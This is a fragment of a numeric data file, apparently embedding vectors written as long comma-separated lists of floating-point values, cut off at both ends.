8,-0.0113772005,-0.016494146,0.006509487,-0.008566775,-0.014952141,0.049685422,0.0056655235,-0.032387003,0.0137468,-0.0027491483,0.021228027,0.030556196,0.012092554,0.024797417,0.0131386975,0.0012288609,0.01794069,-0.029264392,-0.0037490749,0.0018525444,-0.009583693,-0.002842187,-0.013281066,0.0146837775,0.0065747183,0.01052765,-0.017546846,0.024832092,0.008748678,0.026959125,-0.012277512,0.0013529436,0.012923931,0.001180307,0.013057876,0.0050371015,-0.018342426,0.03634811,0.014755937,-0.043300565,-0.014770403,-0.0050595594,0.002090051,-0.022887757,0.00088174565,0.020178301,-0.013181925,-0.018781189,-0.029738894,0.020418027,0.008826674,0.0003993369,0.01110702,0.027467227,0.028980387,-0.0031078197,0.010532852,-0.016342442,0.0122046815,0.03328385,-0.0074294815,-0.022316862,0.034090545,0.008739959,0.029535584,-0.011789376,-0.01895362,0.016148983,-0.0036326505,0.0032191663,0.007165007,-0.0030461932,0.0017912803,0.0068114023,0.0057554673,-0.011770259,0.0028086205,0.032241113,0.014602147,-0.0044796355,-0.012072938,0.028987853,0.02325686,0.011513557,-0.008739992,-0.0073385485,-0.02238009,-0.015170581,-0.005431181,-0.006812384,-0.007187073,-0.00511467,-0.0061429515,-0.020700391,-0.011819745,0.00034192498,-0.0022549927,-0.0055375122,0.013021706,0.007381529,0.012421701,0.0049088076,0.00024170484,-0.00091206876,0.012759496,0.0056431904,-0.0071810377,-0.01538911,-0.03841591,-0.015902035,-0.0058440096,0.016747613,0.0033155594,0.024322126,0.010854249,-0.027667463,0.03016201,0.016761236,0.014203243,-0.010885645,0.008924271,-0.005196643,-0.020998862,-0.004399245,-0.0027879302,0.010814721,0.015397535,-0.009259372,-0.003837248,-0.000069106776,0.004926794,-0.013986217,0.08636509,-0.028323285,0.019616868,-0.013327224,0.0108758295,-0.0058866735,0.010108977,0.010226198,-0.006031824,-0.0036827868,-0.024692094,-0.006559381,-0.021548705,-0.013296674,0.011712185,-0.016266707,-0.0009832279,0.015384426,0.014954224,0.013387026,-0.0010502806,-0.006440402,-0.018438607,0.020779843,0.005530798,0.011079479,0.010181968,-0.027219208,0.015900293,0.0025747619,-0.0018263817,0.0032652328,0.005456568,0.0048301867,-0.0041470323,0.009933909,0.019863758,-0.0027066635,-0.0051705446,0.02487199,0.00251825,-0.008809359,0.054595605,0.0035878378,0.011096692,0.0070678764,-0.017668111,0.010730799,-0.0097184535,-0.012059463,0.020752873,-0.010951806,-0.015020135,-0.009745813,-0.015458641,-0.012006627,-0.008905965,0.017219428,0.01766689,-0.0058699283,0.0010325004,0.016363654,0.001492728,0.006788697,0.001113708,-0.014453343,-0.0021583245,0.0075968034,0.0067132986,-0.013290555,0.009282076,0.0032466033,0.026024623,-0.01026851,0.008532706,0.014836632,0.021227265,-0.010082541,-0.020318352,-0.016560083,-0.00655234,-0.002844278,0.024250861,0.024914082,0.015317173,0.011888699,0.0011440411,0.008157186,0.042524956,0.0051187812,0.017813887,-0.0118572395,-0.0031443548,0.007250381,0.02085738,0.025944278,-0.011547246,-0.00046826163,-0.025708556,0.0040988694,-0.001948517,-0.002919702,0.0021081553,-0.019204203,0.0019417098,-0.0032114678,-0.004566148,-0.026727283,0.001298266,0.032369606,-0.0026583245,0.01614449,-0.008192927,-0.007328164,-0.008680326,0.0009808991,0.022533877,0.0036839468,-0.0076568997,0.012687936,0.0025039979,0.015783895,-0.015145719,-0.05615569,-0.0008949609,0.15856753,0.008102233,-0.0067323567,0.016660802,0.018342001,0.0018904586,-0.09854659,-0.016698537,0.0011413338,-0.007196565,-0.017109975,-0.014695737,-0.02413367,0.035132367,0.009039172,-0.0014046807,-0.012580685,-0.025170531,-0.0063030208,-0.009424093,0.01547678,0.013135129,-0.015412242,0.020529361,-0.019717444,-0.0044289487,0.025114406,-0.02171615,-0.00042029284,-0.018602183,0.005177121,-0.0017333339,-0.004492278,0.0006094406,-0.010898315,0.0020415208,0.016899366,0.014735025,-0.017418964,-0.008383898,0.041360207,-0.00511245,-0.023030298,-0.009585145,-0.09429497,0.0025364687,-0.00075464114,-0.039273616,0.0048807515,-0.008186708,-0.008333356,0.0032890595,0.0066618514,-0.022477614,0.008374865,0.02162999,-0.0060728197,-0.016682342,-0.016433293,-0.018616956,0.002923603,-0.0006703868,0.0066104615,-0.014268066,-0.0017722334,-0.014430121,-0.017684307,0.0031892383,-0.011182342,0.01914083,0.015036878,0.013797741,0.0040722163,-0.002204122,-0.015018402,0.018104138,-0.019867584,-0.0047205742,-0.018664522,-0.006060311,-0.03187947,0.0053371536,-0.0037062108,0.005463859,0.00052897324,-0.0013016582,-0.021959016,-0.023521611,-0.00043274503,-0.000896333,0.0018452005,-0.0062412433,0.015930332,-0.0061836718,0.021159073,-0.0020336665,-0.016567139,0.0028143006,-0.00476859,-0.009080325,0.002684744,-0.034373503,0.00352448,0.01360268,-0.0059247795,-0.022993071,-0.013742935,-0.012237308,0.03597134,0.02265113,0.007011041,-0.03742674,0.0055001057,0.00034785806,-0.010110133,0.0005071129,0.0004755024,-0.037680376,0.009233943,0.023552286,-0.01648682,0.0005057914,-0.006290153,-0.033484723,0.03196959,-0.012736691,0.0057395007,-0.029074125,0.0065636304,-0.0025828627,0.0043631825,0.008276993,-0.028912432,-0.00038256843,0.03944903,0.009563731,-0.0015349083,-0.017282708,0.014120182,-0.0022866235,0.037633132,0.0068749716,-0.036745448,0.01931405,-0.010383833,0.00010071281,-0.008724815,0.028980669,-0.00068895944,0.016036639,0.010226338,-0.018277334,-0.0320392,-0.0045595095,0.0085784225,-0.0035562369,0.022824164,-0.00022496433,-0.0022663793,-0.00907203,0.0152796265,0.002900405,0.002886574,-0.004416906,-0.02578728,0.01785198,0.0028079168,0.0018147178,0.02011013,-0.008046009,-0.021542182,0.0061860248,-0.02257291,0.007828121,0.00657484,0.02314066,0.001565799,0.02923724,-0.01612906,-0.0072199227,-0.018456066,0.02800917,-0.005533511,-0.0059111062,-0.0084433835,-0.0038178235,-0.0058809,-0.010409251,0.0033197624,0.0016301624,0.015283769,-0.011569903,0.019652693,0.0033380687,0.00086702075,0.016438397,0.004540199,0.018063989,-0.009856229,0.0629019,-0.0064926967,-0.024014268,0.04472314,0.023427224,-0.022713171,0.029074132,-0.015062415,-0.026241394,-0.03763388,-0.03953266,-0.0021101267,-0.003971001,0.018636782,-0.026500061,0.018048786,0.0047666235,0.010299761,-0.0019159466,0.0032980822,0.0073435777,-0.03739473,-0.014735628,0.029463857,-0.0013957269,0.00052327575,-0.00028684177,0.017708069,-0.016454803,0.005812245,0.007719433,-0.010298433,-0.018247388,0.0075005754,0.03755824,-0.041354924,-0.0086743,-0.015420034,0.00784568,-0.0046276366,0.01075825,-0.0018605997,0.0024655287,-0.003946423,0.007900383,-0.013377642,-0.019966805,0.018290278,0.0019397537,0.021945326,0.006336695,0.021835215,-0.024642752,0.008605079,0.010405324,-0.0034506249,-0.03426192,0.0017465448,0.011627496,-0.012991549,-0.0049070283,-0.018252756,-0.022114316,-0.008152122,-0.012852113,0.0009022862,0.0012193564,0.026554236,0.01230319,0.01777236,0.0033735333,-0.0014858714,0.00049683335,0.02685824,-0.004505178,0.00218723,-0.040579304,0.004178572,-0.016707405,0.009958341,0.01987267,0.017517649,-0.004031464,0.009623159,-0.017759308,-0.04408991,-0.018408332,0.00057410414,-0.037064638,-0.010394834,0.01805269,0.008242719,-0.009001395,0.0018256695,0.013014645,0.013657067,0.003177513,0.0043816576,0.005457891,0.010621484,0.004224499,0.0070287087,-0.009990001,-0.022376366,0.005680008,-0.019469108,-0.0003465735,0.011713669,-0.0048080045,-0.0062326267,-0.0024580215,-0.025653208,0.018933367,-0.031801216,-0.015622593,0.031963743,-0.022939518,0.012838026,-0.0050656674,-0.012472792,-0.008967188,-0.027856067,-0.010707895,0.016907467,0.04666089,-0.0018397091,-0.007402072,0.011032743,-0.031148467,0.015824417,0.013440322,0.030933714,0.013832147,-0.0063419985,0.01207897,-0.011865834,0.007953301,0.033656612,0.007262934,0.014682798,-0.0013406281,0.006118359,-0.006467119,-0.008075721,-0.009192806,0.007816559,0.018489143,-0.034813393,-0.038175996,0.016431246,-0.010291091,-0.0022020105,-0.0013219008,-0.026981615,-0.009078468,-0.012795694,-0.028665233,-0.004690847,-0.020018935,-0.018954339,-0.003502926,0.01227833,0.016906459,-0.017404381,-0.026428519,0.011745049,0.033417102,-0.006258539,0.011427094,0.005062403,0.008445867,-0.03335162,0.0040923636,-0.022333743,-0.021663839,-0.0014303016,-0.003825317,0.0089345835,-0.018354924,-0.008708226,0.00870953,0.010076084,-0.0009153723,0.006042615,0.014560715,0.020094944,0.020119952,0.039677594,-0.00415829,-0.0020042304,-0.0068675578,0.0026639889,-0.010595983,-0.0052668313,-0.057399377,-0.00908718,0.019448778,0.0011816728,0.0021575887,0.0067822067,-0.0047785193,0.0056737177,-0.03728057,-0.008664577,0.0077304896,-0.008649963,-0.016300585,-0.007983746,0.008371907,-0.011207787,-0.020257525,-0.0048490255,-0.03487787,-0.0015526669,-0.0018673515,-0.0012985665,-0.010689168,0.01908472,-0.004648668,-0.029730588,0.012696834,0.001643673,-0.016151229,0.022040846,-0.007775087,-0.0060312,-0.00936647,0.03604361,-0.02719806,-0.014583264,0.010481772,0.043996114,-0.0066556623,-0.011059555,0.009352585,-0.025582125,-0.027009586,-0.021727202,-0.035207387,0.0134826815,-0.0038606396,-0.016885564,-0.023000866,0.01605928,-0.004982736,-0.007501583,-0.00012593687,0.0010653487,0.024274867,0.016633658,0.015627855,-0.029989284,-0.023149017,-0.024097545,0.0010967929,-0.038393095,0.007591711,0.007885536,0.0122262975,-0.01327456,-0.0017352159,-0.012313723,-0.019244827,-0.005055592,-0.015977647,0.019633532,0.004715454,0.010243219,0.013434083,-0.0028439753,-0.014466551,-0.002122986,-0.01142813,-0.014436246,0.003094735,-0.006455952,0.019468185,-0.024224965,0.0023773827,-0.012920923,0.050493125,-0.013927121,0.0061162664,0.01010671,0.0028903608,-0.02620238,0.014031635,0.010630284,-0.006874644,-0.018580506,-0.005891907,0.024743874,0.0149094295,-0.013542073,-0.023324491,0.00054601993,-0.000447387,-0.008649477,0.013705444,0.0059062154,0.020111738,0.0034830694,-0.0056665377,0.030752743,-0.0066726343,-0.0011191479,0.023520995,0.0024430333,0.02195682,-0.01223742,-0.0009793744,-0.0067829625,-0.001921872,-0.033806317,0.009340281,-0.003573259,-0.011638268,0.021292081,-0.0050973673,0.011926426,-0.0063593932,0.012388219,-0.014231519,-0.0036624915,-0.015113373,-0.005619851,-0.029950192,0.010986496,-0.012943417,0.003599009,0.005597023,-0.019250154,0.024185741,-0.1642512,0.005455118,-0.009510031,-0.03734768,-0.01374001,-0.01822452,0.0033023455,0.037192773,0.014850115,-0.02657605,-0.0096170325,0.032404933,0.010333177,0.0055253273,0.030378273,-0.0077766227,-0.039793294,0.010737784,-0.015293666,0.01229721,0.018562235,-0.0010876585,-0.012418775,-0.0064983703,0.03203499,0.007718396,-0.0027680665,-0.0048132134,0.008333906,0.006779468,-0.0041944054,0.0018475676,0.0019144673,0.03361628,0.007990945,0.024863357,0.006191361,0.008282709,-0.00038269546,0.015434138,-0.008125984,0.0014144306,-0.0003611232,-0.0047514075,0.024643315,-0.012015268,0.027871521,0.016827038,0.031148553,0.00065235305,-0.03078547,0.0082463585,0.0028661503,-0.0090366015,-0.001598964,0.00059492333,0.012191476,0.01914189,0.01354011,-0.013249685,-0.012202539,-0.009163682,0.0069380933,-0.0118847,0.0032685401,0.010614407,-0.003445519,0.010894909,-0.0046354583,-0.014286565,0.025426866,0.015337528,-0.0007627608,-0.00093162735,0.019397527,0.018343937,0.0030341155,-0.037428368,-0.020846123,0.0049676555,-0.019104812,0.005137869,0.01108486,0.030280998,-0.009860028,-0.0077809896,0.0016592199,-0.0007389401,0.005500856,0.019452961,0.0141057875,-0.008931295,-0.013455126,-0.027586298,0.012910719,-0.012579979,-0.004260768,0.02917318,-0.0129962675,0.014575836,-0.019650338,0.005658193,0.02027258,-0.03421092,-0.1146466,0.0059189904,0.0075210743,0.0075405412,-0.008891458,-0.0102799265,0.009669273,-0.00074711925,0.040626254,0.020689657,-0.026605876,0.01923236,-0.019662071,-0.0016249109,-0.0019920848,0.0077120876,-0.02119767,-0.017046036,0.0075967466,-0.01361439,0.011462362,-0.0059444476,-0.005113224,0.011223255,0.0057148337,0.00027413364,-0.009166646,0.03262772,0.01819439,-0.0021007692,-0.01523487,0.003567106,-0.007010549,0.0050470214,-0.09179943,0.019668935,-0.0066521317,-0.003969431,-0.0074836435,0.019660186,-0.00557031,0.015708461,0.0011607583,0.013872124,0.00085223565,-0.02900479,-0.0034552312,-0.0032825028,0.0049364534,-0.0045534163,-0.010952949,-0.00033672043,0.011934213,0.009268967,0.0021754263,-0.018316984,-0.021481173,-0.017023912,0.008908647,-0.0060361517,0.005488268,-0.0108899195,0.007604277,0.017327731,0.0047126384,0.031342417,0.004985185,0.025178418,-0.0009455636,0.028517345,0.034975402,0.028247805,-0.004173977,-0.016018959,0.028044682,-0.012475872,0.013167498,0.0078127,0.008888286,-0.0032504024,-0.015977427,0.010183635,-0.0016761621,0.0150796445,-0.032482315,-0.0008026067,0.015069385,0.00017347658,-0.0030751661,-0.0066331346,-0.0026258666,0.006600506,-0.004198948,0.039044518,0.006252731,0.012479159,0.051585723,0.0031217937,-0.017054316,-0.01431753,-0.014611101,-0.011835212,-0.010616239,0.0050603226,-0.011587139,0.011968917,0.029060943,0.013989213,-0.008726281,0.006298722,-0.0048652794,0.016507423,-0.004620944,-0.01206566,-0.016564915,-0.012858926,-0.021367254,-0.014285484,0.006281118,0.002417403,-0.0077497796,-0.00846844,-0.0060315817,-0.008073295,-0.007237891,-0.025258284,-0.0008111468,0.015042723,-0.007930936,-0.012302845,-0.0006768567,0.0072781243,0.038536347,-0.02439913,-0.033461984,0.0070801955,-0.026513986,0.0063464274,0.0077433847,0.0040293727,-0.010623026,-0.012812082,-0.0013830777,-0.014367298,-0.017202342,-0.010765548,-0.012161912,0.014471743,-0.007110656,0.002034781,0.026206527,-0.010229445,0.0024170035,0.025990019,0.0050403685,0.0042309184,-0.014541379,-0.018102838,-0.0021247352,0.009688517,-0.019326864,-0.0055864914,0.02287869,-0.009614728,-0.0050014574,0.005702985,-0.006901892,0.01371174,-0.0060189283,0.018379753,0.01172823,-0.0028579473,0.00266246,-0.0049284664,0.006875851,-0.0128440475,0.025559835,0.028680542,0.030437965,0.020747965,-0.024440905,0.0114893885,0.0058962805,0.0010416257,-0.00859474,0.020111093,-0.0042857663,0.008647431,0.0018384897,-0.009591484,0.032707456,-0.0075745964,-0.006398172,-0.005810291,0.011641249,-0.003802039,0.009408101,-0.0057862615,0.0027967205,-0.010743728,-0.009426454,0.0020861411,0.015390077,0.005540242,0.013612829,-0.00019421273,0.006937449,0.03950187,0.0011136997,-0.009334597,-0.003936502,0.027413258,0.0057335324,-0.036806736,0.00084186083,0.022251917,-0.0016912471,-0.019810261,-0.0032709222,0.029937206,-0.0009917081,-0.008748797,0.006309336,0.029215211,0.0058433106,0.021125492,0.0140794935,0.03876203,-0.0040276577,-0.013550058,0.0035045997,-0.02043659,-0.030375902,-0.00015583304,0.013071653,0.014335187,0.026714586,0.016088013,0.014099256,0.01162214,0.024701847,0.02035285,0.018310042,0.005101664,0.0112112835,0.013539544,0.012601259,0.018722799,0.0076779737,0.03237817,-0.004277559,0.004276851,-0.010504691,0.013527959,-0.022952437,-0.002433519,0.011061752,0.011383293,-0.0003001322,0.0074617183,-0.011575825,-0.0024180675,-0.018584404,-0.014775299,0.001263213,-0.009964871,-0.012939004,-0.011958627,0.0024653736,-0.011702746,-0.006242562,0.0022977814,-0.0062008044,0.02160231,0.0125519745,0.000546449,0.014351074,0.005935086,0.0133104045,0.01478141,-0.0003528905,-0.0012716443,0.00085314485,0.011478022,0.02064664,-0.008955671,-0.0009824673,-0.009120868,-0.005992129,-0.013202712,0.02885781,-0.011304516,-0.017668236,-0.01696546,-0.020095065,0.011876003,0.0085992785,-0.0064061526,0.006506139,0.021578431,0.004614334,-0.0045160037,-0.00057522225,0.00458157,0.024464555,-0.0022995945,0.0029876991,0.0026549457,-0.013146606,-0.015237032,-0.005723099,0.010193141,-0.011486069,0.028570017,0.028877124,-0.0015676419,-0.016883355,0.0047025485,-0.052967608,-0.018097326,-0.02711692,-0.0030215308,0.015716895,-0.0130599495,0.0115252,0.008054315,-0.01846408,0.022415316,-0.029928582,0.0030876999,0.01571126,0.011535738,-0.0047757877,-0.005479062,0.023522029,0.008979076,0.023677802,0.03028706,-0.017876798,0.0047274875,0.0067763496,0.022018243,-0.003974472,0.0054345736,-0.008251923,0.002634055,0.0021890786,0.0013025512,0.019281674,-0.010868016,-0.023591908,0.003325369,-0.022236181,0.010297464,-0.01435998,0.0123935705,-0.030497376,-0.008083854,0.0064011784,0.008603401,-0.026165996,0.014787633,-0.016650598,-0.0049581267,0.0052923784,-0.026801087,-0.02093483,0.004955302,-0.010206841,0.004092341,0.0050592893,0.017519496,-0.023710642,-0.028167447,0.00010935879,-0.083766,-0.0049904464,0.023457168,0.008109514,0.035819624,0.012284437,0.00028327885,-0.0014608772,0.0012778498,0.03675951,-0.0013517389,-0.011096036,-0.03276745,-0.018515507,0.022812275,-0.00059729884,-0.0060648206,0.011611929,-0.008463684,-0.00970037,-0.0033413456,0.0021743223,-0.005287776,-0.009998633,0.010901815,-0.0016319329,-0.0111935465,-0.013610977,0.017318105,0.000011758104,0.008942834,-0.007364151,0.008980747,-0.02489544,0.003085369,-0.0016599369,-0.02357433,0.011535344,0.010311347,-0.026477998,-0.017389989,-0.0103068855,0.0030161801,-0.005502568,-0.0075145876,0.009178424,-0.043696124,0.023540556,-0.003982049,-0.0075117107,-0.01599544,-0.0009730554,-0.002282081,0.011449001,-0.001724527,-0.0067467475,0.0141601665,-0.026251879,0.0066965125,0.0075649535,-0.0076962146,0.022384346,0.005451316,-0.014802256,-0.0018658858,-0.023238804,-0.0029108976,0.022359604,-0.016070962,-0.013819938,0.0023074048,-0.00827113,-0.002042457,-0.0024820701,-0.012173795,0.0039355285,0.019058308,-0.0078562135,-0.0031789516,0.009771968,0.054127764,-0.00523159,0.018124865,0.0019372638,0.0148962615,0.011725606,-0.0029918014,0.008095257,0.051350653,0.0056669703,-0.011343331,-0.008114895,-0.0006183816,0.0028711918,0.008726443,0.024640622,-0.021320583,-0.013248802,0.021669338,-0.0017631819,0.006791812,-0.012174441,0.0031625822,-0.017003262,-0.014327471,-0.0021736813,-0.010860758,-0.023292903,0.0020780012,0.0057011438,0.008099438,0.016050594,-0.0017235378,0.034396842,0.017279888,0.003066338,-0.013792146,0.016328845,-0.006417259,-0.022530315,-0.007395447,-0.013516219,-0.0031114002,0.033456266,0.00070919254,-0.0040946696,0.012409309,0.011967105,-0.015360517,0.016753767,-0.0002034419,0.028778821,0.021547975,0.025156615,-0.011161672,0.0008866082,-0.021945225,0.019623164,-0.007942493,0.045735735,-0.021317245,-0.02479248,-0.008844848,-0.0075985463,-0.009457936,0.009585887,0.009883688,-0.011313815,-0.0008244559,-0.0013152944,-0.00092963217,-0.013617584,0.017342743,-0.0063589704,-0.0075320094,0.008908836,0.022352414,0.003638505,-0.023018649,-0.00034271964,-0.006784156,0.014099292,0.02038121,-0.007705542,-0.023450326,-0.00812171,0.023318034,-0.00546101,0.00931268,-0.020300644,-0.015679255,0.010977941,0.005023555,-0.00467227,-0.014040564,-0.008373446,0.019163178,0.0004262365,-0.0007615913,-0.004577174,0.0020997026,0.02317823,-0.0007303795,-0.015145402,-0.038685035,-0.0120488275,0.015275319,0.01707062,0.0073182518,0.010416539,0.0050930427,0.011223895,-0.013929357,-0.012455819,0.008965094,0.0039256103,0.008535435,-0.013425709,-0.009449309,0.014638575,-0.0016652576,0.010131782,-0.0115415165,-0.0022185938,0.022668174,0.0050239046,-0.0029309248,-0.00010902746,-0.008870024,-0.0012350014,0.014684479,-0.017222345,-0.011964123,0.1218366,0.00780857,-0.043134674,0.008564491,0.006116534,-0.007255212,0.018972982,-0.024356604,0.008072945,0.0038801136,0.01558011,-0.019023914,0.0148526225,-0.00047670177,-0.0022203764,0.022759618,0.0033664203,-0.016581606,-0.014183118,0.009252693,-0.0018417621,-0.022003453,-0.0032066712,-0.013639566,-0.015100613,-0.05335816,0.02618944,0.02123128,0.029703321,0.010871798,0.006431784,0.013529321,-0.0037013674,0.021431211,-0.026912931,-0.0056043165,-0.0017659407,-0.021345729,-0.012106272,-0.03429266,0.018189542,0.0035121925,-0.017386718,-0.016615722,-0.000045247023,0.004557401,-0.011453353,0.005785443,-0.0015731411,-0.01826408,0.006578716,-0.006811222,0.008510967,-0.019627115,0.001231033,0.004747941,0.0019808302,0.00902739,0.03349379,-0.014927687,0.00456016,0.002238926,-0.004222926,-0.009120039,0.0020857134,0.018573683,-0.022379037,0.0063912068,-0.0072942665,-0.009508475,0.026327364,-0.003741548,0.026360517,0.011185042,-0.04056967,-0.0042575514,-0.0081740385,-0.014480008,0.00072893425,0.001945414,0.009898198,-0.006479019,0.0025979474,0.03006754,-0.0049419245,0.0034925705,-0.0046949075,0.030947434,-0.004326018,0.00500294,0.0049571246,0.013070305,0.028083501,0.008275544,-0.0031359082,-0.0052011306,0.013600312,0.016413854,-0.016643114,-0.014346929,-0.013822979,0.005186391,0.00662804,0.0013917021,-0.0021902944,-0.008125034,-0.006075934,-0.016415803,-0.0148213,-0.0027607798,0.013629838,0.0064116297,-0.013926669,0.024026489,0.009842132,-0.0039014714,-0.030157028,-0.028678121,0.0154536525,-0.001773377,-0.005155575,-0.0011717661,0.018363632,0.040078282,0.0022288586,0.003919542,-0.011064519,-0.005123544,0.028464206,0.01246705,0.0051789475,-0.022742908,-0.012838712,0.009426119,-0.017787768,-0.007989809,0.01790206,-0.0022326778,0.02751345,0.015825368,0.007567681,-0.0050617764,0.0055186893,-0.02467852,0.0058945497,-0.002440365,0.0063056415,-0.021748915,0.0023791823,-0.012461594,-0.0034724306,0.016662374,0.003152406,-0.024999604,-0.011687929,-0.020076146,0.0053620143,0.023355043,-0.010677026,-0.00042773894,0.018760998,-0.008588522,-0.0067804856,-0.047706142,0.01929546,0.01658235,0.018249335,0.0072951238,-0.003910723,-0.03251948,0.0023134665,-0.013587351,0.007086245,0.034335434,-0.01158339,-0.0020234438,0.019906715,0.011191746,-0.008338154,-0.0072326767,0.014907992,0.028906483,-0.0029005713,-0.014222075,0.040124986,-0.008801811,0.01030891,0.0041082907,-0.0034278103,0.03388026,-0.026133109,-0.0034690287,0.0039313985,0.006944923,0.01740521,0.037200224,-0.032410733,0.06105468,-0.016426241,-0.033823676,0.018007388,0.0037155328,0.007789536,-0.0015264478,0.015344263,0.009921767,0.006169184,-0.0026950352,0.01215209,0.005062382,0.007568194,-0.005151459,0.01956809,-0.017462105,0.0028962074,0.0137636755,0.008658415,-0.023191622,-0.004189354,0.0069361147,-0.023477258,0.0028232192,-0.02364855,0.004140065,-0.0073849577,-0.009302487,-0.015949855,0.00650846,0.014823816,-0.024202038,-0.013922984,0.019494258,-0.015545539,-0.0035984283,-0.009721075,0.017493203,0.047757886,0.008294153,-0.0016112407,-0.0061694966,0.010975382,0.00084824953,0.015467653,-0.03095761,-0.02533977,0.009932176,0.007194689,0.0045798547,0.022694098,-0.015477989,-0.052588847,-0.0094419755,-0.0057833153,-0.011761956,-0.034316353,-0.025262985,-0.015170415,0.026832297,0.010767507,0.0044127926,0.005501558,0.02186143,-0.0065079583,0.022722522,0.002992051,0.0012416394,0.017419558,-0.00895726,-0.0020568068,-0.001500484,-0.0042765304,-0.004457426,-0.022389984,0.011187972,-0.004350213,0.0042686258,0.0047925063,0.0037336089,0.009523359,-0.011291045,0.01459897,-0.012494294,0.01767659,-0.014447699,0.0064129964,-0.000020642587,-0.0073448108,0.01153728,0.049668204,-0.05274529,0.008378668,0.005401712,0.015349715,-0.058783904,0.028390529,0.00407191,-0.019227834,-0.01930265,0.01575684,0.012194359,-0.020075636,-0.041623574,0.0137674725,0.00832575,-0.012485353,-0.0058756433,0.026435591,-0.0051777223,-0.018241527,0.03161665,-0.019602535,-0.0033506586,-0.025586892,0.010738548,-0.021113526,-0.0086584035,0.0042816964,0.018227167,0.02911776,0.023626039,0.0032099974,-0.011007701,0.005776175,-0.007570134,-0.0056913476,0.014451811,0.0010743636,-0.019715723,-0.033367127,-0.01279339,0.008219602,0.0071690977,0.0061146207,-0.012367347,-0.015167821,0.006046183,-0.010354587,0.13513115,-0.0065742955,0.0023745564,0.002425071,-0.0074483478,-0.000446888,-0.017799035,0.018218461,-0.003917417,0.003395133,-0.0056898403,-0.014206823,0.0050320807,0.045454193,-0.00977486,-0.0014974165,0.009527967,0.09776679,0.0012665933,0.023914218,-0.008521144,-0.014205993,0.007041809,0.016011816,0.022486089,-0.058118448,0.0034758372,-0.03702988,0.005185379,-0.0034842768,-0.023671404,0.0014961689,0.0014316527,0.009568902,-0.02151642,0.009870781,0.004377467,-0.0022567213,-0.024391985,-0.019488597,-0.0043210424,0.0017315814,-0.008501167,0.009378899,-0.010627735,0.015280789,-0.011142217,0.007215806,-0.018555904,0.015316017,0.005099703,-0.04626478,0.004839404,-0.010114569,-0.00392595,-0.01366775,0.0023759347,0.012395814,-0.008664604,0.0038316748,0.015345524,0.00228714,0.006173873,0.013463317,-0.009050973,-0.004962414,-0.0050291526,-0.005265861,-0.0068402714,-0.006683335,0.014312073,0.03051927,0.0094972765,-0.008936804,0.0051462245,0.0060448884,0.000263361,-0.010765148,0.019579919,-0.0047014984,0.036616065,0.025427049,-0.014144713,-0.0054980298,0.0007906702,0.022571215,0.01650002,-0.018691408,-0.008754424,-0.008770923,-0.012210922,0.0054781474,-0.00037124968,0.00045739836,-0.0018498264,-0.0007328752,0.0023325537,-0.022409998,-0.0045044543,-0.029098129,-0.025926055,0.027909849,0.0073839016,0.0050757374,-0.012847739,0.017041907,-0.0073000835,-0.01983596,-0.0070539606,0.010628922,0.0034044369,-0.0026927588,-0.0037816446,0.023371348,-0.007364202,-0.007394173,0.00746685,0.005633943,-0.00910375,0.0056338958,0.0042776167,0.0041303397,0.004683029,0.0048665307,-0.015366521,0.008564894,0.029111223,0.028056463,0.01143425,-0.014567938,0.014577938,0.02773785,0.020307183,0.025619999,0.006062966,-0.021627441,0.017834948,-0.001333283,0.0054276767,0.0061790575,0.009095216,0.01814377,-0.0017973932,-0.016781807,-0.004719423,-0.008249826,0.015291029,-0.012968571],[-0.0039558453,0.0057562576,-0.009335987,-0.024020042,0.022968179,-0.033617664,0.004456564,-0.00036010143,0.009363864,-0.010715116,-0.0009905691,0.016434513,0.0011961457,0.0014494861,-0.03306118,0.001553574,0.02589686,0.01836037,0.022676053,0.0048225652,0.015314727,-0.0020740305,0.023606772,-0.00297828,0.009336464,0.0072618094,-0.012917315,-0.010878377,-0.006586004,0.0062103723,-0.016065996,0.023612952,0.016656948,0.014687481,0.015250268,0.0038493716,-0.03486432,-0.02620906,0.013202983,-0.018526541,0.0012720149,0.011256787,-0.020633409,0.036550958,-0.012473393,-0.0032205607,-0.022636658,0.019388964,-0.013930555,0.000115331466,-0.0012428198,0.0044265445,-0.042283084,0.01880091,-0.026611513,0.026422033,-0.003875171,-0.02162144,0.015949592,-0.0037585583,-0.002324421,0.017766971,0.0018213042,-0.020465644,0.0017625085,-0.009638061,0.005422711,-0.0040281136,-0.0043173083,-0.020131102,-0.0046344595,-0.0017770389,0.0024780836,0.004598638,0.013854524,0.0049272403,-0.0066956785,0.0004038355,-0.019702438,0.03156779,0.0017611107,-0.026001409,0.010885368,-0.0029782841,0.03611757,0.01920969,-0.001245105,-0.0048364126,-0.00057663897,-0.024984518,-0.0134679815,0.0076554986,0.014464573,-0.009952811,-0.017785788,0.0054951487,-0.008479045,0.01088676,-0.002064211,0.008986725,-0.014289766,0.011956025,-0.036947537,0.01601636,0.0134464055,-0.026569333,-0.009784328,-0.012302791,-0.02730621,-0.038418375,0.018317398,0.004660516,0.00010403258,-0.0013240207,0.0011645709,-0.011617097,-0.0017704009,-0.0031683892,-0.014691878,0.00525199,-0.009298709,0.019592112,-0.000743826,0.007772049,0.009420043,-0.019461399,-0.003183345,0.01054058,-0.0055958307,0.010716529,-0.01290011,0.030945964,-0.007405585,-0.0071700364,0.0038652068,0.008559908,0.0042357887,-0.0061163204,0.004564975,-0.002764519,0.014748067,-0.008648972,0.024351342,-0.0064574154,0.019176673,0.019115506,-0.0017858514,0.008878845,0.009813672,-0.032439288,-0.005077612,-0.009500667,-0.0039584897,-0.039355934,-0.003395261,0.011101973,0.0009186278,-0.016141325,-0.014779455,-0.00414214,-0.016178675,-0.016364072,0.011042423,-0.018241284,-0.004392298,-0.023172325,-0.001662621,-0.0170797,-0.010535473,0.005582217,0.017847154,0.036378197,0.0046906197,0.0014368491,0.004682882,-0.003559458,-0.012473563,-0.01897946,-0.017092478,-0.023106083,0.007846285,0.0050441334,-0.016325088,-0.010808343,-0.00827085,0.037762646,0.017956467,-0.004021295,-0.0028686405,0.0063875904,0.0077884933,-0.026321614,0.0017579219,0.0014954102,-0.019499805,-0.018190872,-0.01365748,0.0958787,-0.0030069058,-0.014309673,-0.028380333,0.014116988,0.018950416,-0.038993593,0.0045977053,-0.017136639,0.011102973,-0.032587152,-0.006211087,-0.014175749,0.015368161,-0.021260828,-0.0129952105,0.0010752537,0.019340122,-0.05261643,0.012011905,0.006039489,0.01025702,0.009435432,-0.02395671,0.009572564,0.010760072,-0.025438672,-0.036054224,-0.017477037,-0.00027963895,0.0032698733,0.0056573804,-0.009317481,0.014173392,0.01901233,-0.031406287,-0.004048871,0.046121817,-0.011590466,0.00606534,-0.016386535,0.021680847,-0.0082906885,-0.01634607,-